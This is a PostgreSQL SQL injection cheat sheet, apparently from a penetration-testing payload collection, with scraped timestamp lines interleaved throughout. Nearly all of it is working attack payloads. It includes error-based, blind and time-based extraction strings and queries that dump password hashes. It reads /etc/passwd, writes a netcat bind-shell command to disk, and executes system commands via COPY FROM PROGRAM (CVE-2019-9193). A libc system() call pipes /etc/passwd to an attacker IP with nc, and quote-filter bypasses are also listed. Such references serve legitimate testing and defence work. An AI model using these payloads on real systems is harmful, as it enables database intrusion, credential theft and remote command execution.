2019-06-29 17:23:34 +00:00
# PostgreSQL injection
## Summary
* [PostgreSQL Comments ](#postgresql-comments )
2019-10-28 10:56:49 +00:00
* [PostgreSQL version ](#postgresql-version )
* [PostgreSQL Current User ](#postgresql-current-user )
* [PostgreSQL List Users ](#postgresql-list-users )
* [PostgreSQL List Password Hashes ](#postgresql-list-password-hashes )
2019-10-29 05:02:39 +00:00
* [PostgreSQL List Database Administrator Accounts ](#postgresql-list-database-administrator-accounts )
2019-10-28 10:56:49 +00:00
* [PostgreSQL List Privileges ](#postgresql-list-privileges )
2021-01-24 17:43:28 +00:00
* [PostgreSQL Check if Current User is Superuser ](#postgresql-check-if-current-user-is-superuser )
2019-10-28 10:56:49 +00:00
* [PostgreSQL database name ](#postgresql-database-name )
* [PostgreSQL List databases ](#postgresql-list-database )
* [PostgreSQL List tables ](#postgresql-list-tables )
* [PostgreSQL List columns ](#postgresql-list-columns )
2019-06-29 17:23:34 +00:00
* [PostgreSQL Error Based ](#postgresql-error-based )
2020-05-05 03:10:44 +00:00
* [PostgreSQL XML Helpers ](#postgresql-xml-helpers )
2019-06-29 17:23:34 +00:00
* [PostgreSQL Blind ](#postgresql-blind )
* [PostgreSQL Time Based ](#postgresql-time-based )
2019-10-28 10:56:49 +00:00
* [PostgreSQL Stacked query ](#postgresql-stacked-query )
2019-06-29 17:23:34 +00:00
* [PostgreSQL File Read ](#postgresql-file-read )
* [PostgreSQL File Write ](#postgresql-file-write )
* [PostgreSQL Command execution ](#postgresql-command-execution )
2019-10-29 13:36:41 +00:00
* [CVE-2019– 9193 ](#cve-20199193 )
* [Using libc.so.6 ](#using-libcso6 )
2020-07-12 05:17:43 +00:00
* [Bypass Filter ](#bypass-filter )
2019-06-29 17:23:34 +00:00
* [References ](#references )
2016-11-29 16:27:35 +00:00
2018-05-20 20:10:33 +00:00
## PostgreSQL Comments
2018-08-12 21:30:22 +00:00
```sql
2018-05-16 21:33:14 +00:00
--
/**/
```
2022-09-10 12:56:31 +00:00
## PostgreSQL chain injection points symbols
```sql
; #Used to terminate a SQL command. The only place it can be used within a statement is within a string constant or quoted identifier.
|| #or statement
# usage examples:
/?whatever=1;(select 1 from pg_sleep(5))
/?whatever=1||(select 1 from pg_sleep(5))
```
2019-10-28 10:56:49 +00:00
## PostgreSQL Version
```sql
SELECT version()
```
## PostgreSQL Current User
```sql
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
```
## PostgreSQL List Users
```sql
SELECT usename FROM pg_user
```
## PostgreSQL List Password Hashes
```sql
SELECT usename, passwd FROM pg_shadow
```
2019-10-29 05:02:39 +00:00
## PostgreSQL List Database Administrator Accounts
```sql
SELECT usename FROM pg_user WHERE usesuper IS TRUE
```
2019-10-28 10:56:49 +00:00
## PostgreSQL List Privileges
```sql
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
```
2021-01-24 17:43:58 +00:00
## PostgreSQL Check if Current User is Superuser
2021-01-24 17:39:52 +00:00
```sql
SHOW is_superuser;
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
```
2019-10-28 10:56:49 +00:00
## PostgreSQL Database Name
```sql
SELECT current_database()
```
## PostgreSQL List Database
```sql
SELECT datname FROM pg_database
```
## PostgreSQL List Tables
```sql
SELECT table_name FROM information_schema.tables
```
## PostgreSQL List Columns
```sql
SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
```
2019-06-29 17:23:34 +00:00
## PostgreSQL Error Based
2018-08-12 21:30:22 +00:00
```sql
2016-11-29 16:27:35 +00:00
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
2019-10-26 12:37:14 +00:00
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
2016-11-29 16:27:35 +00:00
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
2019-10-26 12:37:14 +00:00
' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
2018-05-16 21:33:14 +00:00
```
2020-05-05 03:10:44 +00:00
## PostgreSQL XML helpers
```sql
select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
```
The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based ](#postgresql-error-based ) technique to exfiltrate data without having to worry about `LIMIT` ing your query to one result.
```sql
select database_to_xml(true,true,''); -- dump the current database to XML
select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
```
Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
2019-06-29 17:23:34 +00:00
## PostgreSQL Blind
```sql
' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK
' and substr(version(),1,10) = 'PostgreXXX' and '1 -> KO
```
2018-05-16 21:33:14 +00:00
## PostgreSQL Time Based
2022-09-10 12:56:31 +00:00
#### Identify time based
```sql
select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))
```
#### Database dump time based
```sql
select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
```
#### Table dump time based
```sql
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
```
#### columns dump time based
```sql
2023-01-04 05:02:57 +00:00
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1
2022-09-10 12:56:31 +00:00
```
2018-08-12 21:30:22 +00:00
```sql
2018-05-16 21:33:14 +00:00
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
2018-08-12 21:30:22 +00:00
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
2018-09-01 13:36:33 +00:00
```
2019-10-28 10:56:49 +00:00
## PostgreSQL Stacked Query
Use a semi-colon ";" to add another query
```sql
http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--
```
2018-09-01 13:36:33 +00:00
## PostgreSQL File Read
```sql
2019-02-17 19:02:16 +00:00
select pg_ls_dir('./');
2018-09-01 13:36:33 +00:00
select pg_read_file('PG_VERSION', 0, 200);
```
2020-05-05 03:15:50 +00:00
NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir` . Newer versions (as of [this ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a ) commit) will allow reading any file/filepath for super users or users in the `default_role_read_server_files` group.
2019-02-17 19:02:16 +00:00
2018-09-01 13:36:33 +00:00
```sql
CREATE TABLE temp(t TEXT);
COPY temp FROM '/etc/passwd';
SELECT * FROM temp limit 1 offset 0;
```
2020-05-05 03:10:44 +00:00
```sql
SELECT lo_import('/etc/passwd'); -- will create a large object from the file and return the OID
SELECT lo_get(16420); -- use the OID returned from the above
SELECT * from pg_largeobject; -- or just get all the large objects and their data
```
2018-09-01 13:36:33 +00:00
## PostgreSQL File Write
```sql
CREATE TABLE pentestlab (t TEXT);
INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab';
```
2021-01-30 14:17:35 +00:00
Or as one line:
```sql
COPY (SELECT 'nc -lvvp 2346 -e /bin/bash') TO '/tmp/pentestlab';
```
2020-05-05 03:10:44 +00:00
```sql
SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data
SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20
SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport
```
2019-06-29 17:23:34 +00:00
## PostgreSQL Command execution
2019-03-24 15:00:27 +00:00
2019-07-01 21:29:29 +00:00
### CVE-2019– 9193
Can be used from [Metasploit ](https://github.com/rapid7/metasploit-framework/pull/11598 ) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries.
2019-03-24 15:00:27 +00:00
```SQL
DROP TABLE IF EXISTS cmd_exec; -- [Optional] Drop the table you want to use if it already exists
CREATE TABLE cmd_exec(cmd_output text); -- Create the table you want to hold the command output
COPY cmd_exec FROM PROGRAM 'id'; -- Run the system command via the COPY FROM PROGRAM function
SELECT * FROM cmd_exec; -- [Optional] View the results
DROP TABLE IF EXISTS cmd_exec; -- [Optional] Remove the table
```
![https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png ](https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png )
2019-07-01 21:29:29 +00:00
### Using libc.so.6
```sql
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc < attacker IP > < attacker port > ');
```
2020-07-12 05:14:26 +00:00
### Bypass Filter
#### Quotes
Using CHR
```sql
SELECT CHR(65)||CHR(66)||CHR(67);
```
Using Dollar-signs ( >= version 8 PostgreSQL)
```sql
SELECT $$This is a string$$
SELECT $TAG$This is another string$TAG$
```
2018-12-24 14:02:50 +00:00
## References
2018-09-01 13:36:33 +00:00
2019-03-24 15:00:27 +00:00
* [A Penetration Tester’ s Guide to PostgreSQL - David Hayter ](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9 )
2019-06-29 17:23:34 +00:00
* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf ](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 )
2019-07-01 21:29:29 +00:00
* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov) ](https://hackerone.com/reports/181803 )
2020-06-24 10:10:41 +00:00
* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel ](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/ )
2020-05-05 03:10:44 +00:00
* [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic ](https://pulsesecurity.co.nz/articles/postgres-sqli )
2020-07-12 05:21:18 +00:00
* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - 2009 - INFIGO ](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf )